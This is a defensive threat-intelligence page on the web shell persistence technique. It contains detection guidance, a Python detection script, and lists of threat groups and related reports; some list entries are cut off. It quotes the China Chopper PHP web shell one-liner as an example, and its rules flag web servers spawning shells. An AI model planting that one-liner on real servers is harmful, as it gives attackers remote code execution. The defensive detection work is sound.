Web Shell
Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to access the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server. In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (e.g. China Chopper Web shell client).
Detection logic
Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections; the adversary connects inbound to the server, and that traffic blends with ordinary HTTP requests. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is the following short payload: <?php @eval($_POST['password']);?>

Nevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions, such as spawning cmd.exe or accessing files that are not in the Web directory. File monitoring may be used to detect changes to files in the Web directory of a Web server that do not correspond to legitimate updates to the Web server's content; such changes may indicate implantation of a Web shell script. Log authentication attempts to the server and any unusual traffic patterns to or from the server and the internal network.
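The two detection mechanisms above, expressed as rules run over sample telemetry. This is an added example, not code from ATT&CK or from any of the reports listed below; the event dictionaries, image-name sets, webroot path and the notion of an approved deployment window are all assumptions constructed for illustration.

```python
from datetime import datetime

# Assumed process names; extend to match the web stack actually deployed.
WEB_SERVER_IMAGES = {"w3wp.exe", "httpd", "apache2", "nginx", "php-fpm"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "sh", "bash"}

# Constructed sample events (hypothetical shape, not a real EDR/auditd format).
SAMPLE_EVENTS = [
    {"type": "process", "ts": "2024-05-01T10:02:11", "parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c dir"},
    {"type": "process", "ts": "2024-05-01T10:02:12", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},           # benign: parent is not a web server
    {"type": "file", "ts": "2024-05-01T03:15:00", "path": r"C:\inetpub\wwwroot\index.aspx",
     "process": "msdeploy.exe"},                                             # inside the deployment window
    {"type": "file", "ts": "2024-05-01T10:01:58", "path": r"C:\inetpub\wwwroot\images\upload.aspx",
     "process": "w3wp.exe"},                                                 # web worker wrote a script: suspicious
    {"type": "file", "ts": "2024-05-01T10:01:59", "path": r"C:\Users\admin\notes.txt",
     "process": "notepad.exe"},                                              # outside the webroot
]
WEBROOT = "C:/inetpub/wwwroot"
DEPLOY_WINDOWS = [(datetime(2024, 5, 1, 3, 0), datetime(2024, 5, 1, 3, 30))]  # assumed change-control slot

def basename(path):
    """Normalise Windows or POSIX paths to a lower-case file name."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def process_alerts(events):
    """Rule 1: a web-server worker spawning a shell (the page's cmd.exe example)."""
    alerts = []
    for ev in events:
        if ev["type"] == "process" and basename(ev["parent"]) in WEB_SERVER_IMAGES \
                and basename(ev["image"]) in SHELL_IMAGES:
            alerts.append(f"{ev['ts']} {basename(ev['parent'])} spawned {basename(ev['image'])}: {ev['cmdline']}")
    return alerts

def file_alerts(events, webroot, deploy_windows):
    """Rule 2: a write under the webroot that matches no approved content update."""
    alerts = []
    root = webroot.replace("\\", "/").lower().rstrip("/") + "/"
    for ev in events:
        if ev["type"] != "file" or not ev["path"].replace("\\", "/").lower().startswith(root):
            continue
        ts = datetime.fromisoformat(ev["ts"])
        if any(start <= ts <= end for start, end in deploy_windows):
            continue  # change landed during a sanctioned deployment
        alerts.append(f"{ev['ts']} unexpected write to {ev['path']} by {ev['process']}")
    return alerts

def detect(events, webroot=WEBROOT, deploy_windows=DEPLOY_WINDOWS):
    return process_alerts(events) + file_alerts(events, webroot, deploy_windows)

if __name__ == "__main__":
    for line in detect(SAMPLE_EVENTS):
        print(line)
```

Correlating the two alert streams by time (a webroot write shortly before the worker spawns a shell, as in the sample) is what turns these single-event rules into a confident web shell detection.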
Observed actors
G0082 GALLIUM
G0093 Kimsuky
G0094 Volt Typhoon
G1017 Dragonfly
G0035 APT32
G0050 HAFNIUM
G0125 Sandworm Team
G0034 CURIUM
G1012 APT39
G0087 Moses Staff
G1009 OilRig
G0049 Tropic Trooper
G0081 Leviathan
G0065 APT29
G0016 TEMP.Veles
G0088 BackdoorDiplomacy
G0135 Deep Panda
G0009 Ember Bear
G1003 Volatile Cedar
G0123 Agrius
G1030 APT28
G0007 APT5
G1023 Fox Kitten
G0117 Tonto Team
G0131 Magic Hound
G0059 Threat Group-3390
G0027 FIN13
G1016
Correlated CTI and IR reports
Check Point Research · direct source mapping: OilRig G0049
MITRE ATT&CK · direct source mapping: UNC1860 and the Temple of Oats: Iran's Hidden Hand in Middle Eastern Networks
Google Cloud / Mandiant · direct source mapping: Lebanese Cedar APT
ClearSky Cyber Security · direct source mapping: Iranian Government-Sponsored APT Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities
CISA · curated primary-source mapping: APT41 Targeting Pharmaceutical Sector: Log4Shell to Domain Compromise
1200km CTI repository · explicit report mention: ATT&CK as a Working Tool: Theory and Hands-On Practical Usage
1200km CTI repository · explicit report mention: Attack Playbook: Operation DragonRx
1200km CTI repository · explicit report mention: CTI Research: Handala Hack Group (aka Handala Hack Team)
1200km CTI repository · explicit report mention: Defensive CTI Research on Threats to Israeli Government and Public-Sector Environments
Israel Threat Actors CTI · explicit report mention: Defensive Cyber Threat Intelligence Report: Israeli Critical Infrastructure and Geopolitical Escalation (2024-2026)
Israel Threat Actors CTI · explicit report mention: From Threat Intelligence to Detection: A Practitioner's Guide
1200km CTI repository · explicit report mention: Operation DragonRx: APT41 Full Attack Simulation
1200km CTI repository · explicit report mention: Operation DragonRx: Simulating an APT41 Attack End-to-End, From Log4Shell to DFIR and Malware Analysis
1200km CTI repository · explicit report mention: Pioneer Kitten (Fox Kitten, Lemon Sandstorm, UNC757): Actor Deep Research
Israel Threat Actors CTI · explicit report mention: Worked Cases
Israel Threat Actors CTI · explicit report mention: APT41 Targeting Pharmaceutical Sector: Log4Shell to Domain Compromise
1200km Medium · authored report mention: Attack Playbook: Operation DragonRx
1200km Medium · authored report mention: CTI Analyst Field Manual: Complete Reference
1200km Medium · authored report mention: CTI-Led Defensive Strategy for a Cellular Provider: Case Study
1200km Medium · authored report mention: CTI Research: Handala Hack Group (aka Handala Hack Team)
1200km Medium · authored report mention: From Threat Intelligence to Detection: A Practitioner's Guide
1200km Medium · authored report mention: Operation DragonRx: Simulating an APT41 Attack End to End, From Log4Shell to DFIR and Malware
1200km Medium · authored report mention: Single-Event Detection Rules in Cybersecurity
1200km Medium · authored report mention